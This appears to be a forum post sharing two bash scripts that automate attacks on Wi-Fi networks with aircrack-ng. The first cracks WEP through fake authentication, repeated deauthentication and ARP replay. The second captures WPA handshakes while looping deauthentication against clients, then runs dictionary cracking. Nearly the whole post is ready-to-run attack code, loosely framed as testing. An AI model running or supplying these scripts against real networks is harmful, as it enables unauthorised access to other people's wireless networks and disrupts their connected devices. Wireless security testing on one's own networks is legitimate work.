Jump to content

auto-wep.sh; wpa-hcap.sh


frog_bong
 Share

Recommended Posts

We all know that Wired Equivalency Privacy is entirely breakable and that Wireless Protected Access can be broken using a word-list or hash-tables. Here are a couple scripts to HELP you test these things. Make sure aircrack-ng in installed.

#!/bin/bash
##
### Automatic wep-cracking script(run this as ROOT): by frogbong(frogbong.wilson@gmail.com)
##  Note: This script will not work 100% of the time, it is merely a way to reduce typing
#
export IFACE
export BSSID
export CHANNEL

### Check for argument
if [ -z $1 ] 
  then echo "Usage: $0 <interface>"
  echo "Set MONITOR mode interface."
  exit
fi

### Start airodump-ng to collect target information
IFACE=$1
sudo airodump-ng $IFACE
echo "### TARGET INFORMATION ###"
echo "Enter BSSID: "; read BSSID
echo "Enter AP Channel: "; read CHANNEL
echo "Enter Target MAC(optional): "; read CLNTMAC
echo "Starting auto-wep.sh with these parameters: "
echo "   Interface: $IFACE"; sleep 1
echo "       BSSID: $BSSID"; sleep 1
echo "     Channel: $CHANNEL"; sleep 1

### Start wep cracking process using components of aircrack-ng in the background (&)
# Start airodump-ng
xterm -e "sudo airodump-ng --bssid $BSSID --channel $CHANNEL -w AUTO-WEP $IFACE" &

# Start aireplay-ng for fake auth. 
sleep 3
xterm -e "sudo aireplay-ng -1 0 $IFACE -a $BSSID" &

# Wait for fake association before deauth.
sleep 5
xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID; sleep 10; done" &

# Start aireplay-ng for ARP replay
xterm -e "sudo aireplay-ng -3 $IFACE -b $BSSID" &

# Start cracking .cap file after giving some time to generate initialization vectors(iv's)
sleep 60
sudo aircrack-ng AUTO-WEP*.cap

#!/bin/bash
##
### Script to help capture wpa-handshake(run this as ROOT): by frogbong(frogbong.wilson@gmail.com)
##
#

export IFACE 
export BSSID
export CHANNEL
export TIME # time between deauth. broadcast
export CLIENT # client to deauth. (optional)

### Check for argument
if [ -z $1 ] 
  then echo "Usage: $0 <interface>"
  echo "Set MONITOR mode interface."
  exit
fi

### Start airodump-ng to collect target information
IFACE=$1
sudo airodump-ng $IFACE
echo "### TARGET INFORMATION ###"
echo "Enter BSSID: "; read BSSID 
echo "Enter AP Channel: "; read CHANNEL
echo "Enter deauth. delay: "; read TIME 
echo "Enter client(optional): "; read CLIENT
echo "Starting $0 with these parameters: "
echo "   Interface: $IFACE"; sleep 1
echo "       BSSID: $BSSID"; sleep 1
echo "     Channel: $CHANNEL"; sleep 1
echo "  Time Delay: $TIME"; sleep 1

if [ "$CLIENT" != "" ]
  then echo "      Client: $CLIENT"; sleep 1
fi

### Start capture and regular deauth.
# Start airodump-ng to capture handshake
sudo  xterm -e "airodump-ng --bssid $BSSID --channel $CHANNEL -w WPA-HS $IFACE" &

# Start deauth every 20 minutes
sleep 3 # wait for airodump to startup

if [ "$CLIENT" != "" ] 
  then xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID -c $CLIENT; echo 'Sleeping for $TIME seconds'; sleep $TIME; done" &
fi

if [ "$CLIENT" = "" ]
  then xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID; echo 'Sleeping for $TIME second(s)'; sleep $TIME; done" &
fi

# Start aircrack-ng in wpa mode to parse the .cap file for handshakes
while true; do aircrack-ng -a 2 WPA*.cap -w /usr/share/dict/american-english; sleep 30; done

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...